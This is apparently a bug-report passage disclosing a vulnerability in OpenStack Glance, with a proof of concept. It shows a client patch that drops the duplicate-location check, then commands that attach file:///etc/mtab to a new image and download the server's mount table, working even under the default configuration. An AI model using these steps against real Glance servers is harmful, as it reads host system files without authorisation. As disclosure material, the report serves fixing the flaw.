This can be exploited even when the server is configured with "show_multiple_locations = False". (This is more serious because that is the default setting. ) 2014-12-10 17:35:45.137 10953 DEBUG glance.common.config [-] show_multiple_locations = False log_opt_values /mnt/ubuntu/git/glance-juno-stable/glance/.tox/py27/local/lib/python2.7/site-packages/oslo/config/cfg.py:1992 Just patch the client (or send the equivalent request directly with curl): $ git diff diff --git a/glanceclient/v2/images.py b/glanceclient/v2/images.py index 6ec9250..5037553 100644 --- a/glanceclient/v2/images.py +++ b/glanceclient/v2/images.py @@ -217,12 +217,10 @@ class Controller(object): :param metadata: Metadata associated with the location. :returns: The updated image """ - image = self._get_image_with_locations_or_fail(image_id) - url_list = [l['url'] for l in image.locations] - if url in url_list: - err_str = 'A location entry at %s already exists' % url - raise exc.HTTPConflict(err_str) - + #image = self._get_image_with_locations_or_fail(image_id) + #url_list = [l['url'] for l in image.locations] + #if url in url_list: + # err_str = 'A location entry at %s already exists' % url add_patch = [{'op': 'add', 'path': '/locations/-', 'value': {'url': url, 'metadata': metadata}}] self._send_image_update_request(image_id, add_patch) $ glance image-create --disk-format raw --container-format bare +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2014-12-10T17:36:13 | | deleted | False | | deleted_at | None | | disk_format | raw | | id | ca95d79e-7d0e-46d7-9561-72dc5540ed98 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | None | | owner | f68be3a5c2b14721a9e0ed2fcb750481 | | protected | False | | size | 0 | | status | queued | | updated_at | 2014-12-10T17:36:13 | | virtual_size | None | +------------------+--------------------------------------+ $ glance --os-image-api-version 2 location-add --url file:///etc/mtab ca95d79e-7d0e-46d7-9561-72dc5540ed98 +------------------+------------------------------------------------------+ | Property | Value | +------------------+------------------------------------------------------+ | container_format | bare | | created_at | 2014-12-10T17:36:13Z | | disk_format | raw | | file | /v2/images/ca95d79e-7d0e-46d7-9561-72dc5540ed98/file | | id | ca95d79e-7d0e-46d7-9561-72dc5540ed98 | | min_disk | 0 | | min_ram | 0 | | owner | f68be3a5c2b14721a9e0ed2fcb750481 | | protected | False | | schema | /v2/schemas/image | | size | 1144 | | status | active | | tags | [] | | updated_at | 2014-12-10T17:37:18Z | | visibility | private | +------------------+------------------------------------------------------+ $ glance image-download ca95d79e-7d0e-46d7-9561-72dc5540ed98 /dev/vda1 / ext4 rw 0 0 proc /proc proc rw,noexec,nosuid,nodev 0 0 sysfs /sys sysfs rw,noexec,nosuid,nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw,mode=0755 0 0 devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=0620 0 0 tmpfs /run tmpfs rw,noexec,nosuid,size=10%,mode=0755 0 0